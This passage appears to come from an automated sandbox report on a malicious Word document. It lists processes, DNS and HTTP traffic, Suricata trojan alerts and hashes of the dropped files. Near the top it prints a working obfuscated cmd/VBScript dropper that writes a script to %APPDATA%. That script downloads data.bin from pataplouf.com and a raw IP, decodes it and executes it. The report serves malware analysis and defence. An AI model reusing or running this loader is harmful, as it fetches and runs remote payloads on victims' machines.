NuH4((648432/9006))&(MiD(BR6M,(DJWA4q+DJWA4q)-1,2)))" "NqCidt=(T4ps(Mid(I1qC,((DJWA4q Mod Len(I1qC))+1),1)))" "Km=Km+NuH4(UI(Nw3Msh,NqCidt))" "nEXt" "PvWrcOe=50" "eNd fUNcTIoN") do @echo %~i)>"!WicWfar!" && start "" "!WicWfar!"
(PID: 2960)
- wscript.exe "%APPDATA%\7421.vbs" (PID: 3132)
-
cmd.exe
/V /C set "WicWfar=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM Cr4Y7" "SuB GXr2y3(Sq6jK0j)" "R6=14" "Dim Iq" "VBAswUL=68" "Iq=tImEr+Sq6jK0j" "dO wHILE TImEr<Iq" "LoOP" "I7ioU=86" "ENd sUB" "suB LWl()" "LEC19=79" "FzI2AL=""""" "Sq6f=56" "P0f6uo=Cr4Y7 & CtKBcuB & Km("4711117A","RiPK35")" "N05=37" "N4uDk1=Km("2A3F53642C2A526A661117191D13651E6970156A6B","JIR7")" "PyhrWTY=86" "PyLn Cr4Y7 & Km("56384929","Exi1"),P0f6uo" "KKIS=46" "iF IDZ="" tHEn GXr2y3((-5013+5017))" "IDpF=67" "Tc8="TDY"" "XUQO3eX=97" "SEt Y7f3W7=cReaTEoBjeCT(Km("130A373630243077072C3C3828",Tc8))" "LSgg6F=47" "Y7f3W7.RUn N4uDk1 & P0f6uo & FzI2AL,3350-3350,6274-6274" "DVVC9c1=40" "eNd sUb" "suB S6p1()" "OaAtlf=26" "OQMe6=92727628" "Edt51=20" "foR ReNPqOv=1 tO OQMe6" "FG8k=FG8k+1" "neXT" "IUe=54" "If FG8k=OQMe6 TheN" "M8x=69" "GXr2y3((-5758+5762))" "Yh=97" "JJQ(Km("3A33423A6A1A692226422B205929272118293F58693626422B7E572F3C","FRG6JP5"))" "YxyS=88" "eND If" "Cl9ApBj=6" "eND sUB" "FUnctiON CtKBcuB()" "QC6qDWn=69" "CtKBcuB=seCOND(timE)" "WJiCPjB=10" "ENd FUnCtion" "FUnctIoN T4ps(Q2CK)" "BfXHxM=82" "T4ps=aSC(Q2CK)" "MEjOd7G=33" "eND Function" "SUb DBu9MK()" "EZnmFL=55" "dIM Ugk,Ly" "DhsSF=53" "dO WhiLE Ugk<>2190-2189" "Ly=Ly+1" "Loop" "LR=36" "ENd suB" "Sub YP()" "VYeYe=24" "Dim Eb68nG, U8SZ" "For Eb68nG = 78 To 9000665" "U8SZ = Etwttg + 93 + 6 + 90" "Next" "KFQ=31" "eND suB" "Sub BXO7(DTU85k)" "Js4hxmf=90" "DIm Df" "AlM=72" "EX0X="CF"" "Oo=25" "sET Df=CREateObjeCT(Km("07070907046D15373426272E",EX0X))" "LI2=11" "Df.oPen" "IhG2g=34" "Df.TYPe=7917-7916" "SyyA=15" "Df.writE DTU85k" "GbPORm=4" "Df.sAVEtoFIle Cr4Y7 & Km("1C282D23","R2yUO1"),5716-5714" "Lare79=96" "Df.CLOSe" "RFmHVun=75" "LWl" "EZ2c=21" "eNd suB" "FUNCtIoN PyLn(Ik,DZ)" "FyKvcg3=59" "dIM S0yM,B7HT61,RwQ05c,CFehRYL,Jo(5)" "DJ=3" "Jo(5)=52" "QEB=38" "Jo(0)=104" "U0cbnlS=5" "Jo(1)=100" "Y9xV=85" "Jo(3)=50" "Xxu=22" "Jo(4)=54" "KY2qJCt=93" "Jo(2)=107" "VOzu=88" "TY5f=30" "sEt S0yM=cReateOBjECt(Km("100D0A5A18053D2D095675011D3110170B470D1C1B21041D501C", "TCnx3hq"))" "PUAgN=95" "Set B7HT61=S0yM.geTfILe(Ik)" "Uqf=50" "Set CFehRYL=B7HT61.oPENASTExtSTrEam(7166-7165,9596-9596)" "StEr=94" "sEt RwQ05c=S0yM.CReATeTExtFiLE(DZ,6072-6071,3468-3468)" "DOQey=84" "Do unTiL CFehRYL.ATeNdoFstreAM" "RwQ05c.wRItE NuH4(UI(T4ps(CFehRYL.rEad(4429-4428)),Jo(0)))" "loOp" "Lm=3" "RwQ05c.cLosE" "RoIsjEd=53" "CFehRYL.cLOSE" "Gu=81" "enD FunCtion" "FunCtION UI(EFQZ,SE0yo)" "GLs5W=67" "UI=(EFQZ aND Not SE0yo)oR(Not EFQZ ANd SE0yo)" "Fz=33" "End FUNcTiOn" "FUnCtion NuH4(DropWv)" "AR4rv4=73" "NuH4=cHR(DropWv)" "Ms9=52" "eND fuNctIOn" "FUNCTioN JJQ(UJ)" "OYAh98=81" "DIm XvBWP,K9K" "Egz=5" "XFlglR="OGu"" "YTWf=49" "On erRor REsUMe NeXT" "SIaDj6=78" "G7BUm9T="Iz6k0A"" "ELP=97" "seT XvBWP=CREatEOBJECt(Km("2D65084228390E183858242516",G7BUm9T))" "Fn=29" "PKGDU="R2yUO1"" "YP" "T8iE1=3" "Set IBnA2RO=XvBWP.eNVIRonMent(Km("641C7B0D711D67","N4"))" "P4T8C=42" "Cr4Y7=IBnA2RO(Km("0022152C292419","XArEhhp"))&NuH4((492292/5351))& CtKBcuB & CtKBcuB" "SbAKID=42" "X32MGp="IoE7"" "FBEIRB=31" "sEt K9K=crEAteOBJEcT(Km("222C543B0036582F1B6B6F04230D631D3F",X32MGp))" "SUm6=42" "K9K.oPeN Km("3D062E","Cz"),UJ,7385-7385" "Y8bFqUP=52" "K9K.seND()" "Jh8Tf=20" "if K9K.StaTUS=(2684-2484) then" "VyHLv=44" "YP" "V480A=59" "GXr2y3((27928/6982))" "CkJP=4" "BXO7 K9K.RespoNseboDY" "Kho02=28" "Else" "Ys7jk=81" "XK="OOI4"" "UYAzy=82" "sEt K9K= creatEoBJEcT(Km("0220573D203A5B293B676C020301601B1F",XK))" "LN5O7Ce=50" "K9K.opEN Km("3F0866","VxM23"),Km("1D2701234F7C5A6145645B66427D4D7D4766447C113201325B311C3D","Su" ),5930-5930" "Ej0S=75" "K9K.senD()" "S97S7l=10" "If K9K.sTatuS=(3960-3760)ThEn BXO7 K9K.ResponSEbodY" "QIDDBm=52" "RrWUNLf=89" "end if" "FjkjO=10" "eND FuNCTiON" "NlGIUHJ=94" "S6p1" "FUnCtIOn Km(BR6M,I1qC)" "BDptlu=38" "dIm DJWA4q,Nw3Msh,NqCidt" "IbPJn=19" "fOR DJWA4q=1 tO (LEn(BR6M)/2)" "Nw3Msh=(NuH4((-3455+3493)) & NuH4((648432/9006))&(MiD(BR6M,(DJWA4q+DJWA4q)-1,2)))" "NqCidt=(T4ps(Mid(I1qC,((DJWA4q Mod Len(I1qC))+1),1)))" "Km=Km+NuH4(UI(Nw3Msh,NqCidt))" "nEXt" "PvWrcOe=50" "eNd fUNcTIoN") do @echo %~i)>"!WicWfar!" && start "" "!WicWfar!"
(PID: 2960)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
pataplouf.com | 213.186.33.168 | - | France |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
213.186.33.168 |
80
TCP |
wscript.exe PID: 3132 |
France
ASN: 16276 (OVH SAS) |
207.57.8.251 |
80
TCP |
wscript.exe PID: 3132 |
United States
ASN: 2914 (NTT America, Inc.) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
213.186.33.168:80 (pataplouf.com) | GET | pataplouf.com/data.bin | |
207.57.8.251:80 | GET | 207.57.8.251/data.bin |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 213.186.33.168:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
local -> 207.57.8.251:80 (TCP) | A Network Trojan was detected | ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin | 2018052 |
local -> 207.57.8.251:80 (TCP) | A Network Trojan was detected | ET TROJAN Generic .bin download from Dotted Quad | 2018752 |
Extracted Strings
Extracted Files
-
Informative 9
-
-
~WRS{3ADABADE-8D29-4EC4-8035-71CB97618CC1}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
7421.vbs
- Size
- 3.7KiB (3750 bytes)
- Type
- ASCII text, with CRLF line terminators
- MD5
- 19a5c98893e5cb33d01e2b031e5139c8
- SHA1
- 46803f2e119b35357a0059edb5b04086d95c6963
- SHA256
- 7da05adb26faa6f314213b1f9e510bb3ac01c6f596047aec2abe139136502df0
-
~$229c8378ad060a4fc75b8207fdacdf7e0c50ab1fa531dfd6cbad0766de9d20.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- c0bfada812c2a3fc5dd8af34cc050627
- SHA1
- d7c878214df7e0edbe81ff358a458ffa1e15d2df
- SHA256
- fa1ea7122ea2e0ccec49dace0727ef7bdc00b4b40476113c7e1abe0ab717b659
-
~WRS{EA1ABEFC-C34E-423C-A353-F53364F9C020}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
index.dat
- Size
- 596B (596 bytes)
- Type
- data
- MD5
- 0b462b641303760aa9c8d8586b2b42bd
- SHA1
- 069fa62f7f3d822946e46d3d1a9e722b43af1624
- SHA256
- c7cbe4e3aa394cb9056211f7ad1b948f354d4c1efc4aece41a87832d2344df45
-
ExcludeDictionaryEN0409.lex
- Size
- 2B (2 bytes)
- Type
- Little-endian UTF-16 Unicode text, with no line terminators
- MD5
- f3b25701fe362ec84616a93a45ce9998
- SHA1
- d62636d8caec13f04e28442a0a6fa1afeb024bbb
- SHA256
- b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- c0bfada812c2a3fc5dd8af34cc050627
- SHA1
- d7c878214df7e0edbe81ff358a458ffa1e15d2df
- SHA256
- fa1ea7122ea2e0ccec49dace0727ef7bdc00b4b40476113c7e1abe0ab717b659
-
d7229c8378ad060a4fc75b8207fdacdf7e0c50ab1fa531dfd6cbad0766de9d20.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Aug 10 13:48:00 2016, mtime=Wed Aug 10 13:48:00 2016, atime=Wed Aug 10 22:47:08 2016, length=250880, window=hide
- MD5
- 112c8cf4f9e22a67d5b051cf45742684
- SHA1
- d009a88566aa94c611f09f0afa6dc12304a003f0
- SHA256
- 0ab4b19f3a41e810ed6ac74aa5eca0311049bc90ac4318013149fc4a1924b366
-
~WRS{E21BCA9D-446C-4368-B497-F3C124649F1D}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- ab9f1a90553999e9459060980086c006
- SHA1
- 27bafe722deaa68d673643215618d8b0990d0cde
- SHA256
- 4103ff3f14c6ca9f65d3b74902aa5b04a7bd0beadf5fdca20f88b6ae82e355c9
-
Notifications
-
Runtime
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/d7229c8378ad060a4fc75b8207fdacdf7e0c50ab1fa531dfd6cbad0766de9d20/analysis/1470837332/")